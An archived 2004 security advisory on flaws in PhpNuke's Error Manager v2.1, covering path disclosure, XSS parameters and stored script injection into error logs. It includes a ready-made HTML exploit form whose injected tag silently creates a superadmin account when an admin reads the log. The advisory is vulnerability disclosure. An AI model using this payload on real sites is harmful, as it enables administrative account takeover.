exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

waraxe-2004-SA010.txt

waraxe-2004-SA010.txt
Posted Mar 18, 2004
Authored by Janek Vind aka waraxe

Multiple vulnerabilities exist in the Error Manager version 2.1 for PhpNuke 6.0. One of them allows for script injection in error logs, forcing an administrator to execute code when viewing the logs.

tags | exploit, vulnerability
SHA-256 | a4a51f7f7381f1fabc7424da2fa85a5bf60ad1a8a9b6826e3cae1904aa25c303

waraxe-2004-SA010.txt

Change Mirror Download

{===============================================================================
=}
{ [waraxe-2004-SA#010]
}
{===============================================================================
=}
{
}
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]
}
{
}
{===============================================================================
=}


Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

>From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure


Let's look at original code:

//language
if( isset( $newlang ) ) {
include( "language/error/lang-$newlang.php" );
$language = $newlang;
} elseif ( isset( $lang ) ) {
include( "language/error/lang-$lang.php" );
$language = $lang;
} else {
include( "language/error/lang-$language.php" );
}

So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such fi
le or directory in D:\apache_wwwroot\nuke71\error.php on line 19



2. Cross-Site Scripting aka XSS


Again, let's look at original code:


if ($error == 401) {
$pagetitle = "- "._EM401."";
}
if ($error == 403) {
$pagetitle = "- "._EM403."";
}
if ($error == 404) {
$pagetitle = "- "._EM404."";
}
if ($error == 500) {
$pagetitle = "- "._EM500."";
}


This is traditionally coded by using the "switch/case" language constructions, b
ut
for some reason the author uses there "if/if/if/..." construction, not even "if/
elseif/elseif/else".
And we can see, that if variable $error is not the 401, 403, 404 or 500, but som
ething else, then
we can UNINITIALIZED $pagetitle set to any value. This will lead of course to X
SS conditions:

http://localhost/nuke71/error.php?pagetitle=[xss code here]


One more way to XSS exploiting:


http://localhost/nuke71/error.php?error=>[xss code here]


As with all the PhpNuke XSS cases, using of the POST parameters or even better -
COOKIE parameters -
will be preffered, because the GET parameters are strictly filtered in mainfile.
php .



3. Script injection to error log (nasty one!)


This one is my favourite bug. I mean - Error Manager is suppose to log the error
conditions in web server
and therefore admin can find potential bugs on site and of course this logging f
eature will reveale to
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - err
or logging in Error Manager
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags
;)
So we can inject any javascript code to error log and when admin will browse the
logs, the website can be
compromised - for example cookies can be stealed, additional superadmin accounts
can be created without the
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get supe
radmin rights in PhpNuke 6.x-7.1.0]) etc ...

So, there is an attack scenario:

Write the html file like this one -


<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' sr
c='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&ad
d_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>


Use it aginst victim server and then just wait, till admin reads the error log a
nd then
login to your brand new superadmin account ;)




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum staff and to all IT security related people in Estonia!
Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close